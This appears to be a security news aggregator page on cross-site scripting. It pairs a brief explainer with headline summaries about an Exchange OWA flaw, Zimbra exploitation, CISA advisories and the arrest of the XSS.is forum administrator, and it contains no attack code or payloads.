Stay informed on XSS vulnerabilities and defenses with the latest news, expert insights, and security tips on cross-site scripting threats.
Search across headline titles and summaries.
Background for this topic.
XSS, or Cross-Site Scripting, is a type of vulnerability in web applications that allows attackers to inject malicious scripts into web pages viewed by other users. This security flaw enables attackers to bypass access controls, such as the same-origin policy, which are designed to segregate different websites from each other. XSS exploits the trust a user has for a particular site, allowing the attacker to send scripts that appear to be from the site itself.
In the context of information security, XSS is a significant concern as it can be used for various malicious activities, including stealing session tokens, login credentials, or personally identifiable information; defacing websites; or redirecting users to hostile sites. Protecting against XSS requires careful coding practices, such as sanitizing user input and using security measures like Content Security Policy (CSP). Identifying and mitigating XSS vulnerabilities is crucial for maintaining the integrity and security of web applications.
Weekly headline count for the current query.
CVE-2026-42897 stems from a cross-site scripting (XSS) vulnerability and can allow an attacker to compromise Outlook Web Access (OWA) mailboxes.
On Thursday, Microsoft shared mitigations for a high-severity Exchange Server vulnerability exploited in attacks that allow threat actors to execute arbitrary code via cross-site scripting (XSS) while targeting Outlook on the web users. [...]
Microsoft has disclosed a new security vulnerability impacting on-premise versions of Exchange Server that it said has come under active exploitation in the wild
Over 10,000 Zimbra Collaboration Suite (ZCS) instances exposed online are vulnerable to ongoing attacks exploiting a cross-site scripting (XSS) security flaw. [...]
Germany's Federal Criminal Police Office (aka BKA or the Bundeskriminalamt) has unmasked the real identities of two of the key figures associated with the now-defunct REvil (aka Sodinokibi) ransomware-as-a-service (RaaS) operation
Cybersecurity researchers have disclosed a vulnerability in Anthropic's Claude Google Chrome Extension that could have been exploited to trigger malicious prompts simply by visiting a web page
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged government agencies to apply patches for two security flaws impacting Synacor Zimbra Collaboration Suite (ZCS) and Microsoft Office SharePoint, stating they have been actively exploited in the wild
CISA has ordered U.S. government agencies to secure their servers against an actively exploited vulnerability in the Zimbra Collaboration Suite (ZCS). [...]
PLUS: Firefox adds XSS protection; Leadership turnover at CISA; FTC exempts some data collection Infosec In Brief DNS vulnerabilities are being addressed 84 percent faster in the UK public sector thanks to an automated vulnerability scanning system established as part of a program kicked off early last year.…
Cybersecurity researchers have disclosed a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer, allowing them to gather crucial insights on one of the threat actors using the malware in their operations
A cross-site scripting (XSS) flaw in the web-based control panel used by operators of the StealC info-stealing malware allowed researchers to observe active sessions and gather intelligence on the attackers' hardware. [...]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities (KEV) catalog to include a security flaw impacting OpenPLC ScadaBR, citing evidence of active exploitation
A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military
On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle "Toha." Here's a deep dive on what's knowable about Toha, and a short stab at who got nabbed.
React conquered XSS? Think again. That's the reality facing JavaScript developers in 2025, where attackers have quietly evolved their injection techniques to exploit everything from prototype pollution to AI-generated code, bypassing the very frameworks designed to keep applications secure
Also: Clorox Sues IT Vendor Over Password BlunderThis week, XSS forum admin arrested, Clorox sued Cognizant, Lumma Stealer is back, NY regulates water, U.S. maritime cybersecurity rules in effect, new Coyote banking Trojan, a hacker nabbed details of Mexico City auxiliary police, Latin America cyberattacks, and World Leaks stole synthetic data.
The arrest of a suspected administrator for the popular cybercrime forum was one of several enforcement actions in the past week targeting malicious activity.
Also: Clorox Sues IT Vendor Over Password BlunderThis week, XSS forum admin arrested, Clorox sued Cognizant, Lumma Stealer is back, NY regulates water, U.S. maritime cybersecurity rules in effect, new Coyote banking Trojan, a hacker nabbed details of Mexico City auxiliary police, Latin America cyberattacks, and World Leaks stole synthetic data.
Europol on Monday announced the arrest of the suspected administrator of XSS.is (formerly DaMaGeLaB), a notorious Russian-speaking cybercrime platform
The suspected administrator of the Russian-speaking hacking forum XSS.is was arrested by the Ukrainian authorities yesterday at the request of the Paris public prosecutor's office. [...]